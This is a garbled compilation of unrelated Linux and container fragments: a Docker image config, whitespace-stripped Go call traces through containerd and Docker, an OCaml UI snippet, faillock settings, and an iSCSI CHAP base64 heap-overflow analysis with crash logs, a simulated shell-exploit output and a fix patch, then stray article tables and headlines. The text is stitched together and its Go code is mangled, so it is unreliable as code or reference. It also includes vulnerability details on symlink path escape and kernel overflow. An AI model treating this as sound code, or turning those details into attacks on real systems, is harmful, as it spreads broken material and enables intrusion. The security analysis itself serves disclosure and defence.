{"architecture":"amd64","config":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/bash"],"Image":"sha256:337382923f7584f260a9a67e7625aaf9d42c24784c6e92731c29fa3912ae5c47","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{"org.opencontainers.image.version":"24.04"}},"container":"824f27add47a9b8b83f4296fcbd9772627dd3ab13c39c889306a30cd4e2e1fc1","container_config":{"Hostname":"824f27add47a","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sh","-c","#(nop) ","CMD [\"/bin/bash\"]"],"Image":"sha256:337382923f7584f260a9a67e7625aaf9d42c24784c6e92731c29fa3912ae5c47","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{"org.opencontainers.image.version":"24.04"}},"created":"2026-04-10T06:49:18.133477895Z","docker_version":"26.1.3","history":[{"created":"2026-04-10T06:49:15.45210454Z","created_by":"/bin/sh -c #(nop)  ARG RELEASE","empty_layer":true},{"created":"2026-04-10T06:49:15.493474875Z","created_by":"/bin/sh -c #(nop)  ARG LAUNCHPAD_BUILD_ARCH","empty_layer":true},{"created":"2026-04-10T06:49:15.521658623Z","created_by":"/bin/sh -c #(nop)  LABEL org.opencontainers.image.version=24.04","empty_layer":true},{"created":"2026-04-10T06:49:17.706887224Z","created_by":"/bin/sh -c #(nop) ADD file:8ce1caf246e7c778bca84c516d02fd4e83766bb2c530a0fffa8a351b560a2728 in / "},{"created":"2026-04-10T06:49:18.133477895Z","created_by":"/bin/sh -c #(nop)  CMD [\"/bin/bash\"]","empty_layer":true}],"os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:538812a4b9bd45adaac2b5e5b967daa6999aa44eb110aa32ae7c69702b906475"]}}
// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.gofunc(u*Unpacker)fetch(ctxcontext.Context,himages.Handler,layers[]ocispec.Descriptor,done[]chanstruct{})error{eg.Go(func()error{fori,desc:=rangelayers{// [...]_,err=h.Handle(ctx2,desc)// [11]// [...]}})}
// vendor/github.com/containerd/containerd/v2/core/diff/proxy/differ.gofunc(r*diffRemote)Apply(ctxcontext.Context,descocispec.Descriptor,mounts[]mount.Mount,opts...diff.ApplyOpt)(ocispec.Descriptor,error){// [...]req:=&diffapi.ApplyRequest{Diff:oci.DescriptorToProto(desc),Mounts:mount.ToProto(mounts),Payloads:payloads,SyncFs:config.SyncFs,}// [...]resp,err:=r.client.Apply(ctx,req)// <--------// [...]}// vendor/github.com/containerd/containerd/api/services/diff/v1/diff_grpc.pb.gofunc(c*diffClient)Apply(ctxcontext.Context,in*ApplyRequest,opts...grpc.CallOption)(*ApplyResponse,error){out:=new(ApplyResponse)err:=c.cc.Invoke(ctx,"/containerd.services.diff.v1.Diff/Apply",in,out,opts...)// [12]// [...]}
// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.gofunc(u*Unpacker)unpack(himages.Handler,configocispec.Descriptor,layers[]ocispec.Descriptor,)error{// [...]topHalf:=func(iint,descocispec.Descriptor,span*tracing.Span,startAttime.Time)(<-chan*unpackStatus,error){// [...]var(keystringmounts[]mount.Mountopts=append(unpack.SnapshotOpts,snapshots.WithLabels(snapshotLabels)))// [...]key=fmt.Sprintf(snapshots.UnpackKeyFormat,uniquePart(),chainID)mounts,err=sn.Prepare(ctx,key,parent,opts...)// [1]// [...]}}
// vendor/github.com/containerd/containerd/v2/core/snapshots/proxy/proxy.gofunc(p*proxySnapshotter)Prepare(ctxcontext.Context,key,parentstring,opts...snapshots.Opt)([]mount.Mount,error){// [...]resp,err:=p.client.Prepare(ctx,&snapshotsapi.PrepareSnapshotRequest{// [2]Snapshotter:p.snapshotterName,// by default "overlayfs"Key:key,Parent:parent,Labels:local.Labels,})// [...]returnmount.FromProto(resp.Mounts),nil}
// plugins/services/snapshots/service.go// from _Snapshots_Prepare_Handler()func(s*service)Prepare(ctxcontext.Context,pr*snapshotsapi.PrepareSnapshotRequest)(*snapshotsapi.PrepareSnapshotResponse,error){// [...]sn,err:=s.getSnapshotter(pr.Snapshotter)// "overlayfs"// [...]mounts,err:=sn.Prepare(ctx,pr.Key,pr.Parent,opts...)// <--------// [...]return&snapshotsapi.PrepareSnapshotResponse{Mounts:mount.ToProto(mounts),},nil}// core/metadata/snapshot.gofunc(s*snapshotter)Prepare(ctxcontext.Context,key,parentstring,opts...snapshots.Opt)([]mount.Mount,error){mounts,err:=s.createSnapshot(ctx,key,parent,false,opts)// <--------// [...]returnmounts,nil}func(s*snapshotter)createSnapshot(ctxcontext.Context,key,parentstring,readonlybool,opts[]snapshots.Opt)([]mount.Mount,error){// [...]m,err=s.Snapshotter.Prepare(ctx,bkey,bparent,bopts...)// <--------// [...]}// plugins/snapshots/overlay/overlay.gofunc(o*snapshotter)Prepare(ctxcontext.Context,key,parentstring,opts...snapshots.Opt)([]mount.Mount,error){returno.createSnapshot(ctx,snapshots.KindActive,key,parent,opts)// <--------}// plugins/snapshots/overlay/overlay.gofunc(o*snapshotter)createSnapshot(ctxcontext.Context,kindsnapshots.Kind,key,parentstring,opts[]snapshots.Opt)(_[]mount.Mount,errerror){// [...]_,info,_,err=storage.GetInfo(ctx,key)// [...]snapshotDir:=filepath.Join(o.root,"snapshots")td,err=o.prepareDirectory(ctx,snapshotDir,kind)// [...]path=filepath.Join(snapshotDir,s.ID)iferr=os.Rename(td,path);err!=nil{// [3]// [...]}// [...]returno.mounts(s,info),nil}func(o*snapshotter)mounts(sstorage.Snapshot,infosnapshots.Info)[]mount.Mount{// [...]return[]mount.Mount{// [4]{Type:"overlay",// or "bind" ...Source:"overlay",Options:options,},}}
// plugins/services/diff/local.gofunc(l*local)Apply(ctxcontext.Context,er*diffapi.ApplyRequest,_...grpc.CallOption)(*diffapi.ApplyResponse,error){for_,differ:=rangel.differs{// [...]ocidesc,err=differ.Apply(ctx,desc,mounts,opts...)// <--------// [...]}}// core/diff/apply/apply.gofunc(s*fsApplier)Apply(ctxcontext.Context,descocispec.Descriptor,mounts[]mount.Mount,opts...diff.ApplyOpt)(docispec.Descriptor,errerror){// [...]varprocessors[]diff.StreamProcessorfor{ifprocessor,err=diff.GetProcessor(ctx,processor,config.ProcessorPayloads);err!=nil{// [1]// [...]}processors=append(processors,processor)ifprocessor.MediaType()==ocispec.MediaTypeImageLayer{break}}// [...]rc:=&readCounter{r:io.TeeReader(processor,digester.Hash()),}iferr:=apply(ctx,mounts,rc,config.SyncFs);err!=nil{// [2]// [...]}// [...]}
// core/diff/stream.gofuncGetProcessor(ctxcontext.Context,streamStreamProcessor,payloadsmap[string]typeurl.Any)(StreamProcessor,error){// [...]fori:=len(handlers)-1;i>=0;i--{processor,ok:=handlers[i](ctx,stream.MediaType())// [3]ifok{returnprocessor(ctx,stream,payloads)}}returnnil,ErrNoProcessor}funcinit(){RegisterProcessor(compressedHandler)// [4]}funcRegisterProcessor(handlerHandler){handlers=append(handlers,handler)}
// core/diff/stream.gofunccompressedHandler(ctxcontext.Context,mediaTypestring)(StreamProcessorInit,bool){compressed,err:=images.DiffCompression(ctx,mediaType)// [5]// [...]ifcompressed!=""{returnfunc(ctxcontext.Context,streamStreamProcessor,payloadsmap[string]typeurl.Any)(StreamProcessor,error){ds,err:=compression.DecompressStream(stream)// [6]// [...]return&compressedProcessor{rc:ds,},nil},true}// [...]}
// core/diff/apply/apply_linux.gofuncapply(ctxcontext.Context,mounts[]mount.Mount,rio.Reader,syncbool)(retErrerror){switch{caselen(mounts)==1&&mounts[0].Type=="overlay":// [...]path,parents,err:=getOverlayPath(mounts[0].Options)// [7]// [...]_,err=archive.Apply(ctx,path,r,opts...)// <--------// [...]returnerr// [...]}}funcgetOverlayPath(options[]string)(upperstring/* [8] */,lower[]string,errerror){// [...]}// plugins/snapshots/overlay/overlay.gofunc(o*snapshotter)upperPath(idstring)string{returnfilepath.Join(o.root,"snapshots",id,"fs")// [9]}
// pkg/archive/tar.gofuncApply(ctxcontext.Context,rootstring,rio.Reader,opts...ApplyOpt)(int64,error){root=filepath.Clean(root)// [...]options.applyFunc=applyNaive// [...]returnoptions.applyFunc(ctx,root,r,options)// [9]}
// pkg/archive/tar.gofuncapplyNaive(ctxcontext.Context,rootstring,rio.Reader,optionsApplyOptions)(sizeint64,errerror){// [...]root=filepath.Clean(root)// [...]for{// [...]hdr,err:=tr.Next()// [1]// [...]ppath,base:=filepath.Split(hdr.Name)ppath,err=fs.RootPath(root,ppath)path:=filepath.Join(ppath,filepath.Join("/",base))// [2]// [...]srcData:=io.Reader(tr)srcHdr:=hdriferr:=createTarFile(ctx,path,root,srcHdr,srcData,options.NoSameOwner);err!=nil{// [3]// [...]}// [...]}}
// pkg/archive/tar.gofunccreateTarFile(ctxcontext.Context,path,extractDirstring,hdr*tar.Header,readerio.Reader,noSameOwnerbool)error{switchhdr.Typeflag{casetar.TypeDir:// [4]// [...]iffi,err:=os.Lstat(path);err!=nil||!fi.IsDir(){iferr:=mkdir(path,hdrInfo.Mode());err!=nil{// [5]returnerr}}// [...]}}
// pkg/archive/tar.gofuncapplyNaive(ctxcontext.Context,rootstring,rio.Reader,optionsApplyOptions)(sizeint64,errerror){// [...]ppath,base:=filepath.Split(hdr.Name)ppath,err=fs.RootPath(root,ppath)path:=filepath.Join(ppath,filepath.Join("/",base))// [...]}
typecachedRootPathstruct{rootstringcachemap[string]string}funcnewCachedRootPath(rootstring)*cachedRootPath{return&cachedRootPath{root:root,cache:make(map[string]string),}}func(c*cachedRootPath)get(pathstring)(string,error){ifhit,ok:=c.cache[path];ok{returnhit,nil}p,err:=fs.RootPath(c.root,path)iferr!=nil{return"",err}c.cache[path]=preturnp,nil}
ppath,base:=filepath.Split(hdr.Name)ppath,err=rootPath.get(ppath)
"/a" -> "/host/root/a"
"/a" -> "/host/root/a"                     # cached
"/a" -> "/host/root/a" --symlink--> "/etc" # actual
"/a/c" -> "/host/root/a/c" # expected
       -> "/etc/c"         # actual
sudo apt install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
                                         ^^^^^^^^^^^^^
// daemon/command/daemon.gofunc(cli*daemonCLI)start(ctxcontext.Context)(retErrerror){// [...]httpServer:=&http.Server{// [...]}// [...]varphttp.Protocolsp.SetHTTP1(true)p.SetHTTP2(true)p.SetUnencryptedHTTP2(true)routers:=buildRouters(routerOptions{features:d.Features,daemon:d,cluster:c,builder:b,})gs:=newGRPCServer(ctx)b.backend.RegisterGRPC(gs)// [2]httpServer.Protocols=&p// [3]httpServer.Handler=newHTTPHandler(ctx,gs,apiServer.CreateMux(ctx,routers...))// [1]// [...]httpServer.Serve(ls)// [...]}// daemon/command/httphandler.gofuncnewHTTPHandler(ctxcontext.Context,gs*grpc.Server,apiServerhttp.Handler)http.Handler{return&httpHandler{ctx:ctx,grpcServer:gs,apiServer:apiServer,}}
// daemon/command/httphandler.gofunc(h*httpHandler)ServeHTTP(whttp.ResponseWriter,r*http.Request){ifr.ProtoMajor==2&&strings.HasPrefix(r.Header.Get("Content-Type"),"application/grpc"){h.grpcServer.ServeHTTP(w,r)// [4]}else{h.apiServer.ServeHTTP(w,r)// [5]}}
// daemon/command/daemon.goimport(// [...]"github.com/moby/moby/v2/daemon/server/router/container"// [...])funcbuildRouters(optsrouterOptions)[]router.Router{routers:=[]router.Router{// [...]container.NewRouter(opts.daemon),// [6]// [...]}}// daemon/server/router/container/container.gofuncNewRouter(bBackend)router.Router{r:=&containerRouter{backend:b,}r.initRoutes()// [7]returnr}func(c*containerRouter)initRoutes(){c.routes=[]router.Route{// [...]router.NewPostRoute("/containers/{name:.*}/pause",c.postContainersPause),// [...]}}
// daemon/server/router/container/container.gofunc(c*containerRouter)initRoutes(){c.routes=[]router.Route{// [...]router.NewPostRoute("/containers/{name:.*}/pause",c.postContainersPause),// [1]// [...]}}// daemon/server/router/container/container_routes.gofunc(c*containerRouter)postContainersPause(ctxcontext.Context,whttp.ResponseWriter,r*http.Request,varsmap[string]string)error{// [...]iferr:=c.backend.ContainerPause(vars["name"]);err!=nil{// <--------returnerr}w.WriteHeader(http.StatusNoContent)// response to docker-clireturnnil}// daemon/pause.gofunc(daemon*Daemon)ContainerPause(namestring)error{ctr,err:=daemon.GetContainer(name)// [...]returndaemon.containerPause(ctr)// <--------}func(daemon*Daemon)containerPause(container*container.Container)error{tsk,err:=container.GetRunningTask()// [...]tsk.Pause(context.Background())// <--------// [...]}func(t*task)Pause(ctxcontext.Context)error{returnt.Task.Pause(ctx)// [2]}
// daemon/internal/libcontainerd/remote/client.goimport(// [...]containerd"github.com/containerd/containerd/v2/client"// [...])typetaskstruct{containerd.Task// [3]ctr*container}
// client/task.gofunc(t*task)Pause(ctxcontext.Context)error{// [...]_,err:=t.client.TaskService().Pause(ctx,&tasks.PauseTaskRequest{// [4]ContainerID:t.id,})// [...]}// api/services/tasks/v1/tasks.pb.gotypePauseTaskRequeststruct{stateprotoimpl.MessageStatesizeCacheprotoimpl.SizeCacheunknownFieldsprotoimpl.UnknownFieldsContainerIDstring`protobuf:"bytes,1,opt,name=container_id,json=containerId,proto3" json:"container_id,omitempty"`}
// client/client.goimport(// [...]"github.com/containerd/containerd/api/services/tasks/v1"// [5]// [...])func(c*Client)TaskService()tasks.TasksClient{// [...]returntasks.NewTasksClient(c.conn)// v1}
// api/services/tasks/v1/tasks_grpc.pb.gofunc(c*tasksClient)Pause(ctxcontext.Context,in*PauseTaskRequest,opts...grpc.CallOption)(*emptypb.Empty,error){out:=new(emptypb.Empty)err:=c.cc.Invoke(ctx,"/containerd.services.tasks.v1.Tasks/Pause",in,out,opts...)// [...]}// vendor/google.golang.org/grpc/call.gofunc(cc*ClientConn)Invoke(ctxcontext.Context,methodstring,args,replyany,opts...CallOption)error{opts=combine(cc.dopts.callOptions,opts)returninvoke(ctx,method,args,reply,cc,opts...)// <--------}funcInvoke(ctxcontext.Context,methodstring,args,replyany,cc*ClientConn,opts...CallOption)error{returncc.Invoke(ctx,method,args,reply,opts...)// <--------}varunaryStreamDesc=&StreamDesc{ServerStreams:false,ClientStreams:false}funcinvoke(ctxcontext.Context,methodstring,req,replyany,cc*ClientConn,opts...CallOption)error{cs,err:=newClientStream(ctx,unaryStreamDesc,cc,method,opts...)iferr:=cs.SendMsg(req);err!=nil{// [6]returnerr}returncs.RecvMsg(reply)}
// cmd/containerd/main.goimport(// [...]"github.com/containerd/containerd/v2/cmd/containerd/command"// [1]_"github.com/containerd/containerd/v2/cmd/containerd/builtins"// [2]// [...])funcmain(){app:=command.App()// <--------iferr:=app.Run(os.Args);err!=nil{// [...]}}// cmd/containerd/command/main.gofuncApp()*cli.App{// [...]ifconfig.Debug.Address!=""{// [5]varlnet.ListenerifisLocalAddress(config.Debug.Address){ifl,err=sys.GetLocalListener(config.Debug.Address,config.Debug.UID,config.Debug.GID);err!=nil{// [...]}}else{ifl,err=net.Listen("tcp",config.Debug.Address);err!=nil{// [...]}}serve(ctx,l,server.ServeDebug)}// [...]tl,err:=sys.GetLocalListener(config.TTRPC.Address,config.TTRPC.UID,config.TTRPC.GID)serve(ctx,tl,server.ServeTTRPC)// [3]// [...]l,err:=sys.GetLocalListener(config.GRPC.Address,config.GRPC.UID,config.GRPC.GID)serve(ctx,l,server.ServeGRPC)// [4]// [...]}
// cmd/containerd/builtins/builtins.goimport(// [...]_"github.com/containerd/containerd/v2/plugins/services/tasks"// [6]// [...])// plugins/services/tasks/service.gofuncinit(){registry.Register(&plugin.Registration{// [7]Type:plugins.GRPCPlugin,ID:"tasks",Requires:[]plugin.Type{plugins.ServicePlugin,},InitFn:func(ic*plugin.InitContext)(any,error){i,err:=ic.GetByID(plugins.ServicePlugin,services.TasksService)iferr!=nil{returnnil,err}return&service{local:i.(api.TasksClient)},nil},})}
// plugins/services/tasks/service.gofunc(s*service)Register(server*grpc.Server)error{api.RegisterTasksServer(server,s)// <--------returnnil}// api/services/tasks/v1/tasks_grpc.pb.gofuncRegisterTasksServer(sgrpc.ServiceRegistrar,srvTasksServer){s.RegisterService(&Tasks_ServiceDesc,srv)// <--------}varTasks_ServiceDesc=grpc.ServiceDesc{// [8]ServiceName:"containerd.services.tasks.v1.Tasks",HandlerType:(*TasksServer)(nil),Methods:[]grpc.MethodDesc{// [...]{MethodName:"Pause",Handler:_Tasks_Pause_Handler,// [9]},// [...]}}
func_Tasks_Pause_Handler(srvinterface{},ctxcontext.Context,decfunc(interface{})error,interceptorgrpc.UnaryServerInterceptor)(interface{},error){in:=new(PauseTaskRequest)info:=&grpc.UnaryServerInfo{Server:srv,FullMethod:"/containerd.services.tasks.v1.Tasks/Pause",}handler:=func(ctxcontext.Context,reqinterface{})(interface{},error){returnsrv.(TasksServer).Pause(ctx,req.(*PauseTaskRequest))}returninterceptor(ctx,in,info,handler)}
// api/services/tasks/v1/tasks_grpc.pb.gofuncRegisterTasksServer(sgrpc.ServiceRegistrar,srvTasksServer){s.RegisterService(&Tasks_ServiceDesc,srv)// <--------}// plugins/services/tasks/service.gofunc(s*service)Register(server*grpc.Server)error{api.RegisterTasksServer(server,s)// [1]returnnil}
// plugins/services/tasks/service.gofunc(s*service)Pause(ctxcontext.Context,r*api.PauseTaskRequest)(*ptypes.Empty,error){returns.local.Pause(ctx,r)// [2]}funcinit(){registry.Register(&plugin.Registration{// [...]InitFn:func(ic*plugin.InitContext)(any,error){// [...]i,err:=ic.GetByID(plugins.ServicePlugin,services.TasksService)// [4]// [...]return&service{local:i.(api.TasksClient)},nil// [3]},})}// plugins/services/tasks/local.gofuncinit(){registry.Register(&plugin.Registration{// [...]ID:services.TasksService,// [5]// [...]})}
// plugins/services/tasks/local.gofunc(l*local)Pause(ctxcontext.Context,r*api.PauseTaskRequest,_...grpc.CallOption)(*ptypes.Empty,error){// [...]t,err:=l.getTask(ctx,r.ContainerID)// [6], return runtime.Taskerr=t.Pause(ctx)// [6]// [...]}func(l*local)getTask(ctxcontext.Context,idstring)(runtime.Task,error){container,err:=l.getContainer(ctx,id)returnl.getTaskFromContainer(ctx,container)}func(l*local)getContainer(ctxcontext.Context,idstring)(*containers.Container,error){varcontainercontainers.Container// 'initFunc()' set 'l.containers' to 'metadata.NewContainerStore(db)'container,err:=l.containers.Get(ctx,id)// call 'Get()' in 'core/metadata/containers.go'// -> get container from dbreturn&container}func(l*local)getTaskFromContainer(ctxcontext.Context,container*containers.Container)(runtime.Task,error){/**
     * initFunc() set 'l.v2Runtime' to 'v2r.(runtime.PlatformRuntime)'
     * -> v2r is from 'ic.GetByID(plugins.RuntimePluginV2, "task")'
     * -> init() 'core/runtime/v2/task_manager.go' register 'plugins.RuntimePluginV2'
     * -> Get() return 'newShimTask(shim)', which is defined in 'core/runtime/v2/shim.go'
     * -> shimTask is the actual structure which is extended from runtime.Task interface
     */t,err:=l.v2Runtime.Get(ctx,container.ID)returnt}
// core/runtime/v2/shim.gopackagev2funcnewShimTask(shimShimInstance)(*shimTask,error){_,version:=shim.Endpoint()taskClient,err:=NewTaskClient(shim.Client(),version)// [10]// [...]return&shimTask{ShimInstance:shim,task:taskClient,// [9]},nil}func(s*shimTask)Pause(ctxcontext.Context)error{// [8]/**
     * s.task is assigned to NewTaskClient()'s return value, which calls a switch case with client type and version
     * - ttrpc + v2 -> *ttrpcV2Bridge
     * - ttrpc + v3 -> api.NewTTRPCTaskClient
     * - grpc + v3  -> *grpcV3Bridge
     */if_,err:=s.task.Pause(ctx,&task.PauseRequest{ID:s.ID(),})// [...]}
// core/runtime/v2/bridge.gofuncNewTaskClient(clientany,versionint)(TaskServiceClient,error){switchc:=client.(type){case*ttrpc.Client:switchversion{case2:return&ttrpcV2Bridge{client:v2.NewTTRPCTaskClient(c)},nil// <--------case3:returnapi.NewTTRPCTaskClient(c),nil// [...]}casegrpc.ClientConnInterface:// [...]ifversion!=3{// [...]}return&grpcV3Bridge{api.NewTaskClient(c)},nil// [...]}}// api/runtime/task/v2/shim_ttrpc.pb.gofuncNewTTRPCTaskClient(client*ttrpc.Client)TTRPCTaskService{return&ttrpctaskClient{// [11]client:client,}}func(c*ttrpctaskClient)Pause(ctxcontext.Context,req*PauseRequest)(*emptypb.Empty,error){varrespemptypb.Emptyiferr:=c.client.Call(ctx,"containerd.task.v2.Task","Pause",req,&resp);err!=nil{// [12]returnnil,err}return&resp,nil}
// pkg/shim/shim.gofuncrun(ctxcontext.Context,managerManager,configConfig)error{// [...]for_,p:=rangeregistry.Graph(func(*plugin.Registration)bool{returnfalse}){ttrpcServices=append(ttrpcServices,src)// [1]}// [...]for_,srv:=rangettrpcServices{iferr:=srv.RegisterTTRPC(server);err!=nil{// [2]// [...]}}// [...]}
// cmd/containerd-shim-runc-v2/task/service.gofunc(s*service)RegisterTTRPC(server*ttrpc.Server)error{taskAPI.RegisterTTRPCTaskService(server,s)// <--------returnnil}funcRegisterTTRPCTaskService(srv*ttrpc.Server,svcTTRPCTaskService){srv.RegisterService("containerd.task.v2.Task",&ttrpc.ServiceDesc{Methods:map[string]ttrpc.Method{..."Pause":func(ctxcontext.Context,unmarshalfunc(interface{})error)(interface{},error){// [3]varreqPauseRequestiferr:=unmarshal(&req);err!=nil{returnnil,err}returnsvc.Pause(ctx,&req)},...},})}
// cmd/containerd-shim-runc-v2/task/service.gofunc(s*service)Pause(ctxcontext.Context,r*taskAPI.PauseRequest)(*ptypes.Empty,error){container,err:=s.getContainer(r.ID)iferr:=container.Pause(ctx);err!=nil{// <--------// [...]}s.send(&eventstypes.TaskPaused{ContainerID:container.ID,})// [...]}// cmd/containerd-shim-runc-v2/runc/container.gofunc(c*Container)Pause(ctxcontext.Context)error{returnc.process.(*process.Init).Pause(ctx)// <--------}// cmd/containerd-shim-runc-v2/process/init.gofunc(p*Init)Pause(ctxcontext.Context)error{// [...]returnp.initState.Pause(ctx)// <--------}// cmd/containerd-shim-runc-v2/process/init_state.gofunc(s*runningState)Pause(ctxcontext.Context)error{// [...]iferr:=s.p.runtime.Pause(ctx,s.p.id);err!=nil{// <--------// [...]}// [...]}// vendor/github.com/containerd/go-runc/runc.gofunc(r*Runc)Pause(contextcontext.Context,idstring)error{returnr.runOrError(r.command(context,"pause",id))// [4]}
// pause.govarpauseCommand=&cli.Command{Name:"pause",Usage:"pause suspends all processes inside the container",ArgsUsage:`<container-id>

Where "<container-id>" is the name for the instance of the container to be
paused. `,Description:`The pause command suspends all processes in the instance of the container.

Use runc list to identify instances of containers and their current status.`,// Disable comma as separator for slice flags.DisableSliceFlagSeparator:true,Action:func(_context.Context,cmd*cli.Command)error{iferr:=checkArgs(cmd,1,exactArgs);err!=nil{returnerr}container,err:=getContainer(cmd)// [...]err=container.Pause()// [1]// [...]returnnil},}
// libcontainer/container_linux.gofunc(c*Container)Pause()error{// [...]status,err:=c.currentStatus()// [...]switchstatus{caseRunning,Created:iferr:=c.cgroupManager.Freeze(cgroups.Frozen);err!=nil{// [2]returnerr}// [...]}// [...]}
// vendor/github.com/opencontainers/cgroups/systemd/v2.gofunc(m*UnifiedManager)Freeze(statecgroups.FreezerState)error{// m.fsMgr is assigned to 'fs2.NewManager(config, m.path)' in NewUnifiedManager()returnm.fsMgr.Freeze(state)// <--------}// vendor/github.com/opencontainers/cgroups/fs2/fs2.gofunc(m*Manager)Freeze(statecgroups.FreezerState)error{// [...]iferr:=setFreezer(m.dirPath,state);err!=nil{// [3]returnerr}// [...]}
// vendor/github.com/opencontainers/cgroups/fs2/freezer.gofuncsetFreezer(dirPathstring,statecgroups.FreezerState)error{// [...]fd,err:=cgroups.OpenFile(dirPath,"cgroup.freeze",unix.O_RDWR)// [4]// [...]if_,err:=fd.WriteString(stateStr);err!=nil{// [5]// [...]}// [...]}
module Dice = struct
  let faces = ...

  let component (graph @ local) =
    let face, set_face = Bonsai.state (List.hd_exn faces) graph in
    let%arr face and set_face in
    {%html|
      <div>
        You rolled a #{face}
        <button
          style=""
          on_click=%{fun _ ->
            let index = Random.int (List.length faces) in
            set_face (List.nth_exn faces index)}
        >Roll the dice</button>
      </div>
    |}
end
# My user in the output below is "nick", yours will likely be different.
$ faillock --user $USER
nick:
When                Type  Source                                           Valid
2026-05-16 08:00:42 TTY   /dev/pts/30                                          V
2026-05-16 08:00:51 TTY   /dev/pts/30                                          V
2026-05-16 08:00:57 TTY   /dev/pts/30                                          V
# Deny access if the number of consecutive authentication failures
# for this user during the recent interval exceeds n tries.
# The default is 3.
# deny = 3

# The access will be re-enabled after n seconds after the lock out.
# The value 0 has the same meaning as value `never` - the access
# will not be re-enabled without resetting the faillock
# entries by the `faillock` command.
# The default is 600 (10 minutes).
# unlock_time = 600
#
# Root account can become locked as well as regular accounts.
# Enabled if option is present.
# even_deny_root
Defaults passwd_tries=3
case HEX:
    if (strlen(chap_r) != chap->digest_size * 2) {
        pr_err("Malformed CHAP_R\n");
        goto out;
    }
    if (hex2bin(client_digest, chap_r, chap->digest_size) < 0) {
        pr_err("Malformed CHAP_R: invalid HEX\n");
        goto out;
    }
    break;
/* iscsi_target_auth.c:343 */
case BASE64:
    if (chap_base64_decode(client_digest, chap_r, strlen(chap_r)) !=
        chap->digest_size) {
        pr_err("Malformed CHAP_R: invalid BASE64\n");
        goto out;
    }
    break;
/* iscsi_target_auth.c:212 */
static int chap_base64_decode(u8 *dst, const char *src, size_t len)
{
    int i, bits = 0, ac = 0;
    u8 *cp = dst;

    for (i = 0; i < len; i++) {
        ...
        if (bits >= 8) {
            *cp++ = (ac >> (bits - 8)) & 0xff;  /* no bounds check */
            ...
        }
    }
    return cp - dst;
}
127 chars * 6 bits = 762 bits
762 / 8 = 95 bytes written
BUG: KASAN: slab-out-of-bounds in chap_base64_decode+0x18c/0x1a0
Write of size 1 at addr ffff8880099b83e0 by task kworker/1:2/60
CPU: 1 PID: 60 Comm: kworker/1:2 Not tainted 7.1.0-rc2-next-20260508
Call Trace:
 chap_base64_decode+0x18c/0x1a0
 chap_server_compute_hash+0x4c1/0x8e0
 chap_main_loop+0x2b3/0x520
 iscsi_target_do_login+0x1f3/0x420
 iscsi_target_do_login_rx+0x89/0x100
==ASAN: heap-buffer-overflow WRITE of size 1
  #0 chap_base64_decode  vuln_sim.c:36
  #1 main               vuln_sim.c:49
allocated 16-byte region here:
  #0 calloc
  #1 main               vuln_sim.c:44
fn_ptr corrupted, calling 0x55a1b2c3d4e0
executing shell command...
uid=1000(alex) hostname 6.19.11-arch1-1
-       case BASE64:
+       case BASE64: {
+               size_t r_len = strlen(chap_r);
+
+               while (r_len > 0 && chap_r[r_len - 1] == '=')
+                       r_len--;
+               if (r_len > DIV_ROUND_UP(chap->digest_size * 4, 3)) {
+                       pr_err("Malformed CHAP_R: base64 payload too long\n");
+                       goto out;
+               }
                if (chap_base64_decode(client_digest, chap_r, strlen(chap_r)) !=
                    chap->digest_size) {
                        pr_err("Malformed CHAP_R: invalid BASE64\n");
                        goto out;
                }
                break;
+       }

Index entries for this article
Kernel	BPF
Conference	Storage, Filesystem, Memory-Management and BPF Summit/2026

Area	New in Proxmox VE 9.2	What it means for sysadmins
Cluster	Dynamic Load Balancer	Workload placement based on real resource usage
HA	HA Manager Arm/Disarm	Safer maintenance windows without unexpected fencing
SDN	WireGuard and BGP as fabric protocols	More options for encrypted networks and advanced architectures
EVPN	Route maps and prefix lists	Better control over routing and redistribution
CPU	Custom models from the GUI	Less manual editing and better compatibility control
System base	Debian 13.5, kernel 7.0, QEMU 11.0, LXC 7.0	Updated stack for new deployments
Storage	Ceph Tentacle 20.2 and Ceph Squid 19.2	More options for distributed storage clusters

Category	Date	Link	Notes
Linux	2026	TIL: Noctalia Shell Lock on Suspend	My notes on running Niri and Noctalia Shell on the MiniBook X, including lock/suspend workarounds.
Linux		linux-minibook-x	Linux hardware support matrix, kernel caveats and workarounds for MiniBook X variants.
Reviews		Chuwi Minibook X review	A third-party review of the MiniBook X.
Tools		minibook-x-tools	Linux fan, power profile and hardware control utilities for the MiniBook X.

File	Meaning (LC is lifetime count)
pool_limit_hit	LC pool limit hit and pages are forced to the swap partition
pool_total_size	RAM used for zswap data
reject_alloc_fail	LC can’t allocate memory because max_pool_percent has been reached
reject_compress_fail	LC of pages with a compression algorithm failure so go straight to swap partition
reject_compress_poor	LC of pages that can’t compress so go straight to swap partition
reject_kmemcache_fail	LC kernel malloc failure (serious problem?)
reject_reclaim_fail	LC failure to move a page from compressed RAM to disk – serious problem!
stored_pages	Swapped pages stored by zswap
written_back_pages	LC of pages written back to swap partition from zswap

Roastidio.us Tagged with linux

Zswap – etbe – Russell Coker

Zswap vs Zram

Setup

Monitoring

Debian Wiki

Conclusion

USB-LTE4G-EU for reliable 4G LTE Connectivity in IoT and Industrial Applications across Europe

May 2026 ClangBuiltLinux Work | Nathan Chancellor

Linux kernel patches#

Patch handling, review, and input#

Issue triage, input, and reporting#

Tooling improvements#

Behind the scenes#

Special thanks#

Falco: Open-source cloud-native runtime security tool for Linux - Help Net Security

Falco: Open-source cloud-native runtime security tool for Linux

Featured news

Resources

Don't miss

Containers on fire: from container escapes to supply chain attacks

Introduction

Principles of containerization

Current attack vectors

Exploiting host system vulnerabilities

Malicious actions inside the container

Container escape

Privileged containers

CAP_SYS_ADMIN

CAP_SYS_MODULE

CAP_SYS_PTRACE

CAP_NET_ADMIN

Exploitation of orchestration APIs

Supply chain attacks

Takeaways

